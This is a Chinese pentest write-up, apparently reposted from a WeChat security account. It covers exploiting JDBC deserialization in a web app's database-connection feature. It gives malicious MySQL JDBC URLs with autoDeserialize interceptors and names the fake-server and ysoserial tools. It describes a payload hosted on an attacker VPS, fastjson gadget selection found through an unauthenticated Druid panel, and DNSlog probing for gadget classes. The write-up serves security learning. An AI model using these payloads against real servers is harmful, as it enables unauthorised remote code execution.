免责声明
本文章仅用于信息安全防御技术分享,因用于其他用途而产生不良后果,作者不承担任何法律责任,请严格遵循中华人民共和国相关法律法规,禁止做一切违法犯罪行为。
由于传播、利用本公众号所发布的而造成的任何直接或者间接的后果及损失,均由使用者本人承担。威零安全实验室公众号及原文章作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!
在一次测试中遇到了数据库连接功能,这种功能点一般会存在jdbc反序列化漏洞。
先试试打h2不出网利用链。该利用链需要对方服务器导入了h2依赖包才能打。执行ping dnslog命令
然后测试连接,发送请求,看起来并没有收到dnslog请求
下载地址:https://github.com/4ra1n/mysql-fake-server/
在url处写入(目标服务器JDBC Version6.x时使用)
jdbc:mysql://ip:port/test?autoDeserialize=true&statementInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor
(目标服务器JDBC Version8.x时使用)
jdbc:mysql://ip:port/test?autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor
用户名处写入要打的urldns地址,密码可以随便写
接下来可以试试打可以执行命令的链,例如cc链,cb链等。
但是试了几个下来都没有成功执行命令,就是说目标服务器可能没有导入对应的依赖。(过程省略)
刚好bp插件帮我扫到了druid未授权漏洞,可以通过druid未授权看看服务器里的组件有什么,就可以判断打什么链了。
服务器导入的是commons-collections-3.2.2.jar版本,相较于之前的版本增加了一个安全检查,所以没办法直接打cc链。
目标服务器还有c3p0,但是这个链不太好打jdbc反序列化,需要的前置条件比较多。
又发现了目标服务器使用了fastjson,看来可以直接打fastjson链了。
https://github.com/Lotus6/ysoserial
将base64编码的payload在vps上,这里我放到了test文件里
再次创建数据库连接,将用户名处改为deser_CUSTOM
如果目标没有druid未授权,那么怎么知道目标服务器有什么链可以打呢?
可以通过urldns链判断目标有什么利用链,如果存在某个指定的类,就进行dnslog请求,从而判断服务器有什么链,具体原理这里不细讲,有兴趣的可以看这个文章了解。
https://mp.weixin.qq.com/s/KncxkSIZ7HVXZ0iNAX8xPA
https://github.com/kezibei/Urldns
和刚才的步骤相同,放到vps上面,过程省略。成功把目标服务器信息回显出来。
原文始发于微信公众号(威零安全实验室):还不会利用JDBC,快来看看吧???
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
点赞
https://cn-sec.com/archives/3722419.html
复制链接
复制链接
-
左青龙
- 微信扫一扫
-
-
右白虎
- 微信扫一扫
-
评论